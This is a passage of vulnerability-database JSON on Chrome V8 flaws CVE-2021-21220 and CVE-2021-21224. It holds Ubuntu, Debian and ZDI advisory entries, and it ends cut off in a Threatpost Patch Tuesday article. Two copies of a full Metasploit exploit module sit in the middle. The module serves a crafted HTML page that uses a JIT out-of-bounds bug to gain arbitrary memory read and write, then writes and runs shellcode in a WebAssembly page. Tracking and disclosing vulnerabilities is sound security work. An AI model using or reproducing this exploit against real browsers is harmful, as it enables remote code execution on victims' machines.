"HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-04-26T00:00:00", "type": "ubuntucve", "title": "CVE-2021-21224", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21224"], "modified": "2021-04-26T00:00:00", "id": "UB:CVE-2021-21224", "href": "https://ubuntu.com/security/CVE-2021-21224", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T13:19:48", "description": "Insufficient validation of untrusted input in V8 in Google Chrome prior to\n89.0.4389.128 allowed a remote attacker to potentially exploit heap\ncorruption via a crafted HTML page.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[amurray](<https://launchpad.net/~amurray>) | The Debian chromium source package is called chromium-browser in Ubuntu \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | starting with Ubuntu 19.10, the chromium-browser package is just a script that installs the Chromium snap\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-04-26T00:00:00", "type": "ubuntucve", "title": "CVE-2021-21220", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21220"], "modified": "2021-04-26T00:00:00", "id": "UB:CVE-2021-21220", "href": "https://ubuntu.com/security/CVE-2021-21220", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2022-08-17T09:59:11", "description": "Type confusion in V8 in Google Chrome prior to 90.0.4430.85 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-04-26T17:15:00", "type": "debiancve", "title": "CVE-2021-21224", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21224"], "modified": "2021-04-26T17:15:00", "id": "DEBIANCVE:CVE-2021-21224", "href": "https://security-tracker.debian.org/tracker/CVE-2021-21224", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-17T09:59:11", "description": "Insufficient validation of untrusted input in V8 in Google Chrome prior to 89.0.4389.128 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-04-26T17:15:00", "type": "debiancve", "title": "CVE-2021-21220", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21220"], "modified": "2021-04-26T17:15:00", "id": "DEBIANCVE:CVE-2021-21220", "href": "https://security-tracker.debian.org/tracker/CVE-2021-21220", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "zdi": [{"lastseen": "2022-01-31T22:25:29", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Chromium V8. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the implementation of XOR operation when executed within JIT compiled code. By performing actions in JavaScript, an attacker can trigger a memory access past the end of an allocated object. An attacker can leverage this vulnerability to execute code in the context of the current process.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-15T00:00:00", "type": "zdi", "title": "(Pwn2Own) Chromium V8 XOR Typer Mismatch Out-Of-Bounds Access Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21220"], "modified": "2021-04-15T00:00:00", "id": "ZDI-21-411", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-411/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2021-05-03T21:10:08", "description": "", "cvss3": {}, "published": "2021-05-03T00:00:00", "type": "packetstorm", "title": "Google Chrome XOR Typer Out-Of-Bounds Access / Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-21220"], "modified": "2021-05-03T00:00:00", "id": "PACKETSTORM:162437", "href": "https://packetstormsecurity.com/files/162437/Google-Chrome-XOR-Typer-Out-Of-Bounds-Access-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ManualRanking \n \ninclude Msf::Post::File \ninclude Msf::Exploit::Remote::HttpServer \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Google Chrome versions before 89.0.4389.128 V8 XOR Typer Out-Of-Bounds Access RCE', \n'Description' => %q{ \nThis module exploits an issue in the V8 engine on x86_x64 builds of Google Chrome before 89.0.4389.128/90.0.4430.72 \nwhen handling XOR operations in JIT'd JavaScript code. Successful exploitation allows an attacker to execute \narbitrary code within the context of the V8 process. \n \nAs the V8 process is normally sandboxed in the default configuration of Google Chrome, the browser must be run with the \n--no-sandbox option for the payload to work correctly. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'Bruno Keith (bkth_)', # Vulnerability Discovery \n'Niklas Baumstark (_niklasb)', # Vulnerabilty Discovery \n'Rajvardhan Agarwal (r4j0x00)', # exploit \n'Grant Willcox (tekwizz123)' # Metasploit Module \n], \n'References' => [ \n['CVE', '2021-21220'], \n['URL', 'https://github.com/r4j0x00/exploits/tree/master/chrome-0day'], \n['URL', 'https://twitter.com/r4j0x00/status/1382125720344793090'], \n['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=1196683'], # Restricted at the time of writing, but should be public at some point. \n['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-21-411/'] \n], \n'Arch' => [ ARCH_X64 ], \n'DefaultTarget' => 0, \n'Payload' => \n{ \n'Space' => 4096 \n}, \n'Notes' => \n{ \n'Reliability' => [ REPEATABLE_SESSION ], \n'SideEffects' => [ IOC_IN_LOGS ] \n}, \n'Targets' => \n[ \n['Linux - Google Chrome < 89.0.4389.128/90.0.4430.72 (64 bit)', { 'Platform' => 'linux' }], \n['Windows 10 - Google Chrome < 89.0.4389.128/90.0.4430.72 (64 bit)', { 'Platform' => 'win' }], \n['macOS - Google Chrome < 89.0.4389.128/90.0.4430.72 (64 bit)', { 'Platform' => 'osx' }], \n], \n'DisclosureDate' => '2021-04-13' \n) \n) \nend \n \ndef on_request_uri(cli, request) \nprint_status(\"Sending #{request.uri} to #{request['User-Agent']}\") \nshellcode = Rex::Text.to_num(payload.encoded).gsub(/\\r\\n/, '') \njscript = <<~JS \nvar wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]) \nvar wasm_mod = new WebAssembly.Module(wasm_code); \nvar wasm_instance = new WebAssembly.Instance(wasm_mod); \nvar wasm_main_func = wasm_instance.exports.main; \n \nvar buf = new ArrayBuffer(8); \nvar f64_buf = new Float64Array(buf); \nvar u64_buf = new Uint32Array(buf); \n \nvar shellcode = new Uint8Array([#{shellcode}]); \nvar shellbuf = new ArrayBuffer(shellcode.length); \nvar dataview = new DataView(shellbuf); \n \nfunction ftoi(val) { \nf64_buf[0] = val; \nreturn BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n); \n} \n \nfunction itof(val) { \nu64_buf[0] = Number(val & 0xffffffffn); \nu64_buf[1] = Number(val >> 32n); \nreturn f64_buf[0]; \n} \n \nconst _arr = new Uint32Array([2**31]); \n \nfunction foo() { \nvar x = 1; \nx = (_arr[0] ^ 0) + 1; \n \nx = Math.abs(x); \nx -= 0x7FFFFFFF; \nx = Math.max(x, 0); \n \nx -= 1; \nif(x==-1) x = 0; \n \nvar arr = new Array(x); \narr.shift(); \nvar cor = [1.1, 1.2, 1.3]; \n \nreturn [arr, cor]; \n} \n \nfor(var i=0;i<0x3000;++i) \nfoo(); \n \nvar x = foo(); \nvar arr = x[0]; \nvar cor = x[1]; \n \nconst idx = 6; \narr[idx+10] = 0x4242; \n \nif (cor.length == 3) location.reload(); \n \nfunction addrof(k) { \narr[idx+1] = k; \nreturn ftoi(cor[0]) & 0xffffffffn; \n} \n \nfunction fakeobj(k) { \ncor[0] = itof(k); \nreturn arr[idx+1]; \n} \n \nvar arr2 = [cor[3], 1.2, 2.3, 3.4]; \nvar fake = fakeobj(addrof(arr2) + 0x20n); \n \nfunction arbread(addr) { \nif (addr % 2n == 0) { \naddr += 1n; \n} \narr2[1] = itof((2n << 32n) + addr - 8n); \nreturn (fake[0]); \n} \n \nfunction arbwrite(addr, val) { \nif (addr % 2n == 0) { \naddr += 1n; \n} \narr2[1] = itof((2n << 32n) + addr - 8n); \nfake[0] = itof(BigInt(val)); \n} \n \nfunction copy_shellcode(addr, shellcode) { \nlet buf_addr = addrof(shellbuf); \nlet backing_store_addr = buf_addr + 0x14n; \narbwrite(backing_store_addr, addr); \n \nfor (let i = 0; i < shellcode.length; i++) { \ndataview.setUint8(i, shellcode[i]); \n} \n} \n \nvar rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n)); \ncopy_shellcode(rwx_page_addr, shellcode); \nwasm_main_func(); \nJS \n \nhtml = <<~HTML \n<html> \n<head> \n<script> \n#{jscript} \n</script> \n</head> \n<body> \n</body> \n</html> \nHTML \nsend_response(cli, html, { 'Content-Type' => 'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0' }) \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/162437/chrome_cve_2021_21220_v8_insufficient_validation.rb.txt", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2021-07-24T11:33:45", "description": "", "cvss3": {}, "published": "2021-04-13T00:00:00", "type": "seebug", "title": "Chrome \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff08CVE-2021-21220\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-21220"], "modified": "2021-04-13T00:00:00", "id": "SSV:99217", "href": "https://www.seebug.org/vuldb/ssvid-99217", "sourceData": "", "sourceHref": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2021-12-19T03:20:01", "description": "This Metasploit module exploits an issue in the V8 engine on x86_x64 builds of Google Chrome versions prior to 89.0.4389.128/90.0.4430.72 when handling XOR operations in JIT'd JavaScript code. Successful exploitation allows an attacker to execute arbitrary code within the context of the V8 process. As the V8 process is normally sandboxed in the default configuration of Google Chrome, the browser must be run with the --no-sandbox option for the payload to work correctly.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-04T00:00:00", "type": "zdt", "title": "Google Chrome XOR Typer Out-Of-Bounds Access / Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21220"], "modified": "2021-05-04T00:00:00", "id": "1337DAY-ID-36202", "href": "https://0day.today/exploit/description/36202", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Post::File\n include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Google Chrome versions before 89.0.4389.128 V8 XOR Typer Out-Of-Bounds Access RCE',\n 'Description' => %q{\n This module exploits an issue in the V8 engine on x86_x64 builds of Google Chrome before 89.0.4389.128/90.0.4430.72\n when handling XOR operations in JIT'd JavaScript code. Successful exploitation allows an attacker to execute\n arbitrary code within the context of the V8 process.\n\n As the V8 process is normally sandboxed in the default configuration of Google Chrome, the browser must be run with the\n --no-sandbox option for the payload to work correctly.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Bruno Keith (bkth_)', # Vulnerability Discovery\n 'Niklas Baumstark (_niklasb)', # Vulnerabilty Discovery\n 'Rajvardhan Agarwal (r4j0x00)', # exploit\n 'Grant Willcox (tekwizz123)' # Metasploit Module\n ],\n 'References' => [\n ['CVE', '2021-21220'],\n ['URL', 'https://github.com/r4j0x00/exploits/tree/master/chrome-0day'],\n ['URL', 'https://twitter.com/r4j0x00/status/1382125720344793090'],\n ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=1196683'], # Restricted at the time of writing, but should be public at some point.\n ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-21-411/']\n ],\n 'Arch' => [ ARCH_X64 ],\n 'DefaultTarget' => 0,\n 'Payload' =>\n {\n 'Space' => 4096\n },\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'SideEffects' => [ IOC_IN_LOGS ]\n },\n 'Targets' =>\n [\n ['Linux - Google Chrome < 89.0.4389.128/90.0.4430.72 (64 bit)', { 'Platform' => 'linux' }],\n ['Windows 10 - Google Chrome < 89.0.4389.128/90.0.4430.72 (64 bit)', { 'Platform' => 'win' }],\n ['macOS - Google Chrome < 89.0.4389.128/90.0.4430.72 (64 bit)', { 'Platform' => 'osx' }],\n ],\n 'DisclosureDate' => '2021-04-13'\n )\n )\n end\n\n def on_request_uri(cli, request)\n print_status(\"Sending #{request.uri} to #{request['User-Agent']}\")\n shellcode = Rex::Text.to_num(payload.encoded).gsub(/\\r\\n/, '')\n jscript = <<~JS\n var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])\n var wasm_mod = new WebAssembly.Module(wasm_code);\n var wasm_instance = new WebAssembly.Instance(wasm_mod);\n var wasm_main_func = wasm_instance.exports.main;\n\n var buf = new ArrayBuffer(8);\n var f64_buf = new Float64Array(buf);\n var u64_buf = new Uint32Array(buf);\n\n var shellcode = new Uint8Array([#{shellcode}]);\n var shellbuf = new ArrayBuffer(shellcode.length);\n var dataview = new DataView(shellbuf);\n\n function ftoi(val) {\n f64_buf[0] = val;\n return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);\n }\n\n function itof(val) {\n u64_buf[0] = Number(val & 0xffffffffn);\n u64_buf[1] = Number(val >> 32n);\n return f64_buf[0];\n }\n\n const _arr = new Uint32Array([2**31]);\n\n function foo() {\n var x = 1;\n x = (_arr[0] ^ 0) + 1;\n\n x = Math.abs(x);\n x -= 0x7FFFFFFF;\n x = Math.max(x, 0);\n\n x -= 1;\n if(x==-1) x = 0;\n\n var arr = new Array(x);\n arr.shift();\n var cor = [1.1, 1.2, 1.3];\n\n return [arr, cor];\n }\n\n for(var i=0;i<0x3000;++i)\n foo();\n\n var x = foo();\n var arr = x[0];\n var cor = x[1];\n\n const idx = 6;\n arr[idx+10] = 0x4242;\n\n if (cor.length == 3) location.reload();\n\n function addrof(k) {\n arr[idx+1] = k;\n return ftoi(cor[0]) & 0xffffffffn;\n }\n\n function fakeobj(k) {\n cor[0] = itof(k);\n return arr[idx+1];\n }\n\n var arr2 = [cor[3], 1.2, 2.3, 3.4];\n var fake = fakeobj(addrof(arr2) + 0x20n);\n\n function arbread(addr) {\n if (addr % 2n == 0) {\n addr += 1n;\n }\n arr2[1] = itof((2n << 32n) + addr - 8n);\n return (fake[0]);\n }\n\n function arbwrite(addr, val) {\n if (addr % 2n == 0) {\n addr += 1n;\n }\n arr2[1] = itof((2n << 32n) + addr - 8n);\n fake[0] = itof(BigInt(val));\n }\n\n function copy_shellcode(addr, shellcode) {\n let buf_addr = addrof(shellbuf);\n let backing_store_addr = buf_addr + 0x14n;\n arbwrite(backing_store_addr, addr);\n\n for (let i = 0; i < shellcode.length; i++) {\n dataview.setUint8(i, shellcode[i]);\n }\n }\n\n var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n));\n copy_shellcode(rwx_page_addr, shellcode);\n wasm_main_func();\n JS\n\n html = <<~HTML\n <html>\n <head>\n <script>\n #{jscript}\n </script>\n </head>\n <body>\n </body>\n </html>\n HTML\n send_response(cli, html, { 'Content-Type' => 'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0' })\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/36202", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2021-06-08T22:18:00", "description": "Microsoft jumped on 50 vulnerabilities in this month\u2019s [Patch Tuesday update](<https://msrc.microsoft.com/update-guide>), issuing fixes for CVEs in Microsoft Windows, .NET Core and Visual Studio, Microsoft Office, Microsoft Edge (Chromium-based and EdgeHTML), SharePoint Server, Hyper-V, Visual Studio Code \u2013 Kubernetes Tools, Windows HTML Platform, and Windows Remote Desktop.\n\nFive of the CVEs are rated Critical and 45 are rated Important in severity. Microsoft reported that six of the bugs are currently under active attack, while three are publicly known at the time of release.\n\nThe number might seem light \u2013 it represents six fewer patches than Microsoft [released in May](<https://threatpost.com/wormable-windows-bug-dos-rce/166057/>) \u2013 but the number of critical vulnerabilities ticked up to five month-over-month.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThose actively exploited vulnerabilities can enable an attacker to hijack a system. They have no workarounds, so some security experts are recommending that they be patched as the highest priority.\n\nThe six CVEs under active attack in the wild include four elevation of privilege vulnerabilities, one information disclosure vulnerability and one remote code execution (RCE) vulnerability.\n\n## Critical Bugs of Note\n\n[CVE-2021-31985](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31985>) is a critical RCE vulnerability in Microsoft\u2019s Defender antimalware software that should grab attention. A similar, critical bug in Defender was [patched in January](<https://threatpost.com/critical-microsoft-defender-bug-exploited/162992/>). The most serious of the year\u2019s first Patch Tuesday, that earlier Defender bug was an RCE vulnerability that came under active exploit.\n\nAnother critical flaw is [CVE-2021-31963](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31963>), a Microsoft SharePoint Server RCE vulnerability. Jay Goodman, director of product marketing at Automox, said in a [blog post](<https://blog.automox.com/automox-experts-weigh-in-june-patch-tuesday-2021>) that an attacker exploiting this vulnerability \u201ccould take control of a system where they would be free to install programs, view or change data, or create new accounts on the target system with full user rights.\u201d \nWhile Microsoft reports that this vulnerability is less likely to be exploited,Goodman suggested that organizations don\u2019t let it slide: \u201cPatching critical vulnerabilities in the 72-hour window before attackers can weaponize is an important first step to maintaining a safe and secure infrastructure,\u201d he observed.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/06/08141612/Sophos-impact-chart-June-21-patch-Tuesday-e1623176186946.png>)\n\nA year-to-date summary of 2021 Microsoft vulnerability releases as of June. Source: Sophos\n\n## Bugs Exploited in the Wild\n\nMicrosoft fixed a total of seven zero-day vulnerabilities. One was [CVE-2021-31968](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31968>), Windows Remote Desktop Services Denial of Service Vulnerability that was publicly disclosed but hasn\u2019t been seen in attacks. It was issued a CVSS score of 7.5.\n\nThese are the six flaws that MIcrosoft said are under active attack, all of them also zero days.\n\n * [CVE-2021-31955](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31955>) \u2013 Windows Kernel Information Disclosure Vulnerability. Rating: Important. CVSS 5.5\n * [CVE-2021-31956](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31956>) \u2013 Windows NTFS Elevation of Privilege Vulnerability. Rating: Important. CVSS 7.8\n * [CVE-2021-33739](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33739>) \u2013 Microsoft DWM Core Library Elevation of Privilege Vulnerability. Rating: Important. CVSS 8.4\n * [CVE-2021-33742](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33742>) \u2013 Windows MSHTML Platform Remote Code Execution Vulnerability. Rating: **Critical**. CVSS 7.5\n * [CVE-2021-31199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31199>) \u2013 Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability. Rating: Important. CVSS 5.2\n * [CVE-2021-31201](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31201>) \u2013 Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability. Rating: Important. CVSS 5.2\n\n## CVE-2021-33742\n\nThis RCE vulnerability exploits MSHTML, a component used by the Internet Explorer engine to read and display content from websites.The bug could allow an attacker to execute code on a target system if a user views specially crafted web content. The [Zero Day Initiative](<https://www.zerodayinitiative.com/blog/2021/6/8/the-june-2021-security-update-review>)\u2018s (ZDI\u2019s) Dustin Childs noted in his Patch Tuesday analysis that since the vulnerability is in the Trident (MSHTML) engine itself, many different applications are affected, not just Internet Explorer. \u201cIt\u2019s not clear how widespread the active attacks are, but considering the vulnerability impacts all supported Windows versions, this should be at the top of your test and deploy list,\u201d he recommended.\n\nThe vulnerability doesn\u2019t require special privilege to exploit, though the attack complexity is high, if that\u2019s any consolation. An attacker would need to do some extra legwork to pull it off, noted Satnam Narang, staff research engineer at Tenable, in an email to Threatpost on Tuesday.\n\nImmersive Labs\u2019 Kevin Breen, director of cyber threat research, noted that visiting a website in a vulnerable browser is \u201ca simple way for attackers to deliver this exploit.\u201d He told Threatpost via email on Tuesday that since the library is used by other services and applications, \u201cemailing HTML files as part of a phishing campaign is also a viable method of delivery.\u201d\n\n[Sophos decreed](<https://news.sophos.com/en-us/2021/06/08/six-in-the-wild-exploits-patched-in-microsofts-june-security-fix-release/>) this one to be the top concern of this month\u2019s crop, given that it\u2019s already being actively exploited by malicious actors.\n\n## CVE-2021-31955, CVE-2021-31956: Used in PuzzleMaker Targeted Malware\n\nCVE-2021-31955 is an information disclosure vulnerability in the Windows Kernel, while CVE-2021-31956 is an elevation of privilege vulnerability in Windows NTFS. The ZDI\u2019s Childs noted that CVE-2021-31956 was reported by the same researcher who found CVE-2021-31955, an information disclosure bug also listed as under active attack. They could be linked, he suggested: \u201cIt\u2019s possible these bugs were used in conjunction, as that is a common technique \u2013 use a memory leak to get the address needed to escalate privileges. These bugs are important on their own and could be even worse when combined. Definitely prioritize the testing and deployment of these patches.\u201d\n\nHe was spot-on. On Tuesday, Kaspersky announced that its researchers had discovered a highly targeted malware campaign launched in April against multiple companies, in which a previously unknown threat actor used a chain of Chrome and Windows zero-day exploits: Namely, these two.\n\nIn a press release, Kaspersky said that one of the exploits was used for RCE in the Google Chrome web browser, while the other was an elevation of privilege exploit fine-tuned to target \u201cthe latest and most prominent builds\u201d of Windows 10.\n\n\u201cRecent months have seen a wave of advanced threat activity exploiting zero-days in the wild,\u201d according to the release. \u201cIn mid-April, Kaspersky experts discovered yet a new series of highly targeted exploit attacks against multiple companies that allowed the attackers to stealthily compromise the targeted networks.\u201d\n\nKaspersky hasn\u2019t yet found a connection between these attacks and any known threat actors, so it\u2019s gone ahead and dubbed the actor PuzzleMaker. It said that all the attacks were conducted through Chrome and used an exploit that allowed for RCE. Kaspersky researchers weren\u2019t able to retrieve the code for the exploit, but the timeline and availability suggests the attackers were using the now-patched [CVE-2021-21224](<https://www.cvedetails.com/cve/CVE-2021-21224>) vulnerability in Chrome and Chromium browsers that allows attackers to exploit the Chrome renderer process (the processes that are responsible for what happens inside users\u2019 tabs).\n\nKaspersky experts did find and analyze the second exploit, however: An elevation of privilege exploit that exploits two distinct vulnerabilities in the Microsoft Windows OS kernel: CVE-2021-31955 and CVE-2021-31956. The CVE-2021-31955 bug \u201cis affiliated with SuperFetch, a feature first introduced in Windows Vista that aims to reduce software loading times by pre-loading commonly used applications into memory,\u201d they explained.\n\nThe second flaw, CVE-2021-31956, is an Elevation of Privilege vulnerability and heap-based buffer overflow. Kaspersky said that attackers used this vulnerability alongside Windows Notification Facility (WNF) \u201cto create arbitrary memory read/write primitives and execute malware modules with system privileges.\u201d\n\n\u201cOnce the attackers have used both the Chrome 